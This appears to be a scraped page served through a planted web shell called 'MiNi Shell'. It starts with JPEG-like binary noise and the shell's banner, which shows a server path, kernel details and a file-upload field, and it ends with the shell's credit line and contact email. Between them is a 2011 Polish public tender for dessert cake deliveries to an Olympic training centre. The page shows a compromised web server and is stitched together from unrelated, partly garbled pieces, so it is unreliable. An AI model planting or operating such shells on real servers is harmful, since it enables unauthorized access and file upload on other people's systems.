JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111227/438568-N-2011.html

<p class="kh_header"><b>Władysławowo: Dostawy sukcesywne ciast  deserowych  do Ośrodka Przygotowań Olimpijskich we Władysławowie</b><br>
<b>Numer ogłoszenia: 438568 - 2011; data zamieszczenia: 27.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Ośrodek Sportu w Warszawie, Ośrodek Przygotowań Olimpijskich im. Feliksa Stamma we Władysławowie , ul. Żeromskiego 52, 84-120 Władysławowo, woj. pomorskie, tel. 058 6746314, faks 058 6746350.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cetniewo.cos.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Gospodarki Budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy sukcesywne ciast  deserowych  do Ośrodka Przygotowań Olimpijskich we Władysławowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia sa dostawy sukcesywne ciast  deserowych  do Ośrodka Przygotowań Olimpijskich we Władysławowie. Dostawy dotyczą ciast przygotowanych do sprzedaży w kawiarni oraz do konsumcji w jadalni Ośrodka jako deser do posiłków, w trakcie przerw kawowych lub spotkań integracyjnych. Wartośc zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jednolity: Dz. U. 2010 r. Nr 113 poz. 759 ze zm.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.82.00.00-3, 15.81.21.00-4, 15.81.22.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawcy wykonali, a w przypadku świadczeń okresowych również wykonują w okresie ostatnich trzech lat przed upływem terminu składania ofert w niniejszym postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamówienie dotyczące dostaw ciast deserowych do obiektów gastronomicznych (kawiarnie, restauracje) o wartości brutto (na jedno zamówienie, umowę, kontrakt, w okresie maksymalnie 12 miesięcy) nie mniejszej niż 30 000 PLN brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Pkt. 8.	opisu przedmiotu zamówienia (zał. nr 4): W terminie na składanie ofert wszyscy wykonawcy winni przedstawić następujące produkty w celu prezentacji i oceny czy oferta spełnia wymogi Zamawiającego:
Część I
8.1.	Marczello 
8.2.	Sernik wiedeński
8.3.	Sernik z brzoskwinią 
8.4.	Ambasador
8.5.	Ciastko owocowe z galaretką
8.6.	Cappucino
8.7.	Snickers
8.8.	Szarlotka z bitą śmietaną

Część II
8.9.	Ciasto krówka
8.10.	Babka maślana
8.11.	Ciasto sękacz
8.12.	Jabłecznik domowy
8.13.	Ciasteczka w formie sakiewki z jabłkiem 
8.14.	Ciasteczka marcepanki
8.15.	Rolada tortowa
8.16.	Miodownik</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>par. 1 ust.2. istotnych postanowien umowy:	Jeżeli z upływem 12 miesięcy od dnia podpisania niniejszej umowy kwota określona w ust. 1 pozostanie nie zrealizowana, Strony mogą uzgodnić, w formie pisemnego aneksu, realizację niniejszej umowy do momentu osiągnięcia tej kwoty, nie dłużej jednak niż 4 lata od dnia podpisania umowy
3.	Strony zgodnie oświadczają, że ilość podana w formularzu cenowym (załącznik Nr 2 do Umowy) jest szacunkowa. Zamawiający zastrzega sobie prawo, w zależności od preferencji klientów Zamawiającego oraz możliwości Wykonawcy, do zmian: ilości (według zamówień częściowych). 
4.	W trakcie realizacji umowy może nastąpić zmiana produktu na równoważny (bez zmiany ceny jednostkowej i wielkości charakteryzującej) w przypadku zaprzestania produkcji asortymentu wskazanego przez Wykonawcę w ofercie. Warunkiem dokonania zmiany jest przedstawienie przez Wykonawcę pisemnego oświadczenia (lub innego dokumentu) producenta o zaprzestaniu produkcji oraz zgoda Zamawiającego na przedstawiony przez Wykonawcę produkt równoważny.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cetniewo.cos.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: 84-120 Władysławowo, Żeromskiego 52.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2012 godzina 10:00, miejsce: Siedziba Zamawiającego: 84-120 Władysławowo, Żeromskiego 52.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - CIASTKA PRZYGOTOWANE DO SPRZEDAŻY W KAWIARNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CIASTKA PRZYGOTOWANE DO SPRZEDAŻY W KAWIARNI - pokrojone na równe - kwadratowe lub trójkątne - kawałki o wadze minimum 150 g (bez obrzeży z blachy, w której było upieczone ciasto)
1	Marczello /placki biszkoptowe kakaowe przekładane masą czekoladową z bakaliami/o wadze minimum150 g	szt	500
2	Pijak /biszkopt, placek makowo kokosowy przekładany masą budyniową i dżemem/o wadze minimum 150 g	szt	500
3	Sernik wiedeński /kruche ciasto, masa serowa/o wadze minimum 150 g	szt	500
4	Sernik z brzoskwinią kruche ciasto, masa serowa z brzoskwiniami, ubite białko /o wadze minimum 150 g	szt	500
5	Sernik królewski /kruche ciasto kakaowe, masa serowa ,tarte cisto kruche/o wadze minimum 150 g	szt	550
6	Ambasador /biszkopt ,masa tortowa z bakaliami zalana galaretką owocową /o wadze minimum 150 g	szt	500
7	Snickers- ciemny biszkopt, bita śmietana, karmel, orzechy arachidowe- o wadze  minimum 150 g	szt	400
8	Ciastko owocowe z galaretką na biszkopcie z truskawką, jagodą lub brzoskwinią waga minimum 150 g	szt	500
9	Cappucino - ciasto na bazie kakaowego biszkoptu, przełożone kremem cappuccino, wykończone bitą śmietaną, o wysokości minimum 5 cm, o wadze minimum 150g	szt	400
10	W/Z śmietanowa /ciasto biszkoptowe kakaowe  przekładane bitą śmietaną /o wadze minimum 150 g	szt	500
11	Orzechowe /ciasto kruche przekładane powidłami i orzechami włoskimi /o wadze minimum 150 g	szt	400
12	Kokosowe z ananasem /biszkopt  ,masa budyniowa z kawałkami ananasów ,placek kokosowy/o wadze minimum 150 g	szt	450
13	Szarlotka z bitą śmietaną o wadze minimum 150 g	szt	500
14.	Sernik na zimno - o wadze minimum 150 g	szt	400
15.	Torcik hiszpański - o wadze minimum 150 g.	szt	500
16.	Rafaello - puszysty biszkopt, lekki 
krem kokosowy i polewa, o wadze minimum 150 g.	szt	500
17.	Ciasto typu Piaskowiec - na bazie kremu nutella, śmietany ,serków homogenizowanych-waga minimum 150 g	szt	500
18.	Ciastko 3-bit - podkład z placka biszkoptowego, przekładane warstwy herbatników z kremem budyniowym oraz bitą śmietaną, wykończone czekoladą, wysokość około 5 cm, waga minimum 150 g.	szt	500
19.	Tiramisu śmietankowe o wadze minimum 150 g	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3, 15.81.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II  - CIASTA RÓŻNE (jako: DESER DO POSIŁKÓW, NA PRZERWY KAWOWE LUB SPOTKANIA INTEGRACYJNE).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Drożdżówka -ciastko o okrągłym, kopulastym kształcie, wykończone pomadą,  do wyboru z kruszonką, serem, makiem, kokosem, dżemem, budyniem, dwusmakowe, o wadze minimum 100 g	szt	1500
2.	Pączki - ciastko o kształcie owalnym, wykończone pomadą, nadziewane dżemem lub adwokadem,  o wadze minimum 90 g	szt	1200
3.	Rogaliki drożdżowe - ciastka o kształcie nadanym przez ręczne zwijanie, wykończone pomadą, nadziewane dżemem, o wadze minimum 100 g	szt	1000
4.	Jagodzianki - ciastka drożdżowe, wykończone pomadą, z  nadzieniem  jagodowym , o wadze minimum 100 g	szt	1000
5.	Ciastko francuskie - o kształcie kwadratowym, grzebienia lub koperty wykończone pomadą lub cukrem, do wyboru z serem, dżemem, jabłkiem,  o wadze minimum  100 g	szt	600
6.	Ciastka drożdżowe-małe ciasteczka na bazie ciasta drożdżowego z nadzieniem serowym lub marmoladą, wykończone kruszonką i posypane cukrem pudrem, waga 1 szt. minimum  18g	kg	200
7.	Paszteciki z ciasta drożdżowego z nadzieniem pieczarkowym, z dodatkiem przypraw smakowych,  o wadze  minimum 60 g	szt	1200
8.	Jabłecznik  - o kształcie prostokątnym,  ciasto kruche, przekładane jabłkami prażonymi, wykończone pomadą, o wysokości minimum 4 cm, 	kg	100
9	Miodownik-ciasto kruche o smaku miodu, przełożone mlecznym kremem z dodatkiem kaszy marnej, wykończone polewą kajmakową, posypane rozdrobnionymi orzechami arachidowymi, WYSOKOŚĆ minimum 6 cm	kg	50
10	Ciasto mazurek -ciasto o spodzie kruchym, przekładane marmoladą ,z bakaliami, wykończone ciastem kruchym i dekoracją, o wysokości minimum 2 cm	kg	30
11	Ciasto krówka-ciasto biszkoptowe o smaku karmelowym, przekładane masą budyniowo- śmietanową, z polewa kajmakową ,posypane płatkami migdałowymi, WYSOKOŚĆ minimum 6  cm	kg	30
12	Pijak - ciasto na bazie biszkoptu, przekładany plackiem makowo kokosowym, masą budyniową i dżemem, wykończone polewą czekoladową, o wysokości minimum 5 cm	kg	50
13	Ciasto typu karmelowa słodycz-ciasto na bazie biszkoptu z dodatkiem herbatników i krakersów, przekładane masą toffi, wykończone bitą śmietaną, WYSOKOŚĆ  minimum 3.5 cm	kg	60
14	Ciasto owocowe z galaretką - na bazie biszkoptu, z  bitą śmietaną, z owocami i galaretką owocową , o wysokości minimum 5 cm	kg	200
15	Sernik z brzoskwinią - na bazie kruchego spodu, z  masą serową  z brzoskwiniami, wykończone ubitym białkiem, o wysokości minimum 6 cm	kg	80
16	Sernik wiedeński na bazie kruchego spodu, z  masą  serową z dodatkiem rodzynek i skórką pomarańczową,   wykończone polewą czekoladową, o wysokości minimum 4 cm	kg	80
17	Sernik królewski na bazie kruchego spodu, z  masą  serową z dodatkiem rodzynek i skórką pomarańczową, wykończone  tartym  kruchym ciastem z kakao, o wysokości minimum 5 cm	kg	80
18	Ciasto typu mleczna kraina-ciasto deserowe na spodach biszkoptowych przełożonych warstwą mlecznej masy i galaretką pomarańczową, wykończone białą czekoladą, WYSOKOŚĆ   minimum 5 cm	kg	70
19	Kostka tiramisu- jasny biszkopt nasączony mocną kawą i aromatycznym likierem, przełożony kremem, wykończony posypką z kakao, WYSOKOŚĆ minimum  7cm	kg	50
20	Ciasto typu wiśniowa uczta-ciasto na spodzie o smaku orzechowym, z warstwą masy serowej, wykończone wiśniami zalanymi galaretką, WYSOKOŚĆ minimum 6 cm	kg	150
21	Rolada tortowa - zwijane ciasto biszkoptowe, przełożone kremami o różnym smaku owocowym lub orzechowym, o średnicy minimum 5,5 cm i długości minimum 50 cm, 	kg	60
22	Torty  - ciasta deserowe , biszkoptowe lub bezowe, przekładane masą maślaną  o różnych smakach, wykończone elementami dekoracyjnymi, o kształcie okrągłym lub prostokątnym, o wysokości i wadze uzgodnionej z zamawiającym, zależnej od smaku i średnicy / 	kg	150
23	Ciasto typu Pychotka  ciasto kruche z zapiekanym białkiem i orzechami włoskimi,  przekładane dżemem, kremem, o wysokości minimum 5 cm, 	kg	100
24	Keks - ciasto biszkoptowo tłuszczowe z dodatkiem  bakalii, waga gotowego ciasta minimum  0,6 kg  ( przy wymiarach blachy 21,5x9,5 cm) W przypadku większej blachy waga proporcjonalnie wyższa. WYSOKOŚĆ minimum  9 cm	kg	100
25	Babki piaskowa, cytrynowa, kakao-babki biszkoptowo-tłuszczowe wypiekane w foremkach, babki piaskowe wykończone pomadą, cytrynowe wykończone pomadą i skórką cytrynową, babki z kakao polewą czekoladową, waga jednej babki minimum 400 g	kg	200
26	Murzynek ciasto proszkowe kakaowe, wykończone polewą czekoladową , o wysokości minimum 5 cm	kg	100
27	Makowiec na bazie kruchego ciasta  z masą makową, o wysokości minimum 5 cm	kg	50
28	Małe pączki  drożdżowe, o kształcie owalnym z nadzieniem owocowym lub adwokatowym, wykończone pomadą, o wadze jednostkowej minimum 0,028 KG  	kg	200
29	Chruściki - ciasteczka smażone , posypane cukrem pudrem 	kg	200
30	Drożdżówka z kruszonką, wykończona pomadą, o wysokości minimum 3,5 cm 	kg	150
31	Drożdżówka z owocami - ciasto drożdżowe  do wyboru z jagodą lub śliwką, wykończone kruszonką i pomadą , o wysokości minimum 3,5 cm, 	kg	500
32	Drożdżówki mini - ciastka o kształcie okrągłym, kopulastym,   nadziewane dżemem, budyniem,  o  jednostkowej wadze minimum  0,055 kg	szt	1000
33	Ciasto kruche z wiśniami-kruche ciasto, z wiśniami wykończone kruszonką i polewą lukrową, wysokość minimum 3.50 cm	kg	70
34	Omleciki małe - ciasteczka biszkoptowe przekładane budyniem i dżemem, posypane cukrem pudrem WAGA 1 SZT  minimum  20 g	kg	100
35	Babka maślana -babka biszkopotowo- tłuszczowa wypiekana w foremkach, wykończona cukrem pudrem-waga 1 szt minimum 300 g	kg	100
36	Ciasto sękacz-masa biszkoptowo-tłuszczowa, pieczona warstwami w korytkach o wysokości minimum 8 cm 	kg	50
37	Jabłecznik domowy - ciasto biszkoptowo -tłuszczowe, z dodatkiem prażonych jabłek doprawionych cynamonem, wykończone kruchym ciastem i cukrem pudrem,  wysokość minimum  5 cm (możliwość podawania na ciepło)	kg	100
38	Ciasteczka w formie sakiewki z jabłkiem -ciastka francusko- drożdżowe w kształcie sakiewek, w środku z jabłkiem wykończone pomadą, waga jednostkowa 1 szt. minimum  35 g	kg	90
39	Ciasteczka marcepanki-kruche maślane ciastko, wykończone masą marcepanową, z nadzieniem jagodowym i mleczną polewą czekoladową,  waga jednostkowa 1 szt.  minimum 40 g	kg	70
40	Ciastka biszkopciki	kg	30
41	Rogaliki małe - z ciasta drożdżowego,  nadziewane dżemem, wykończone pomadą,	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3, 15.81.21.00-4, 15.81.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com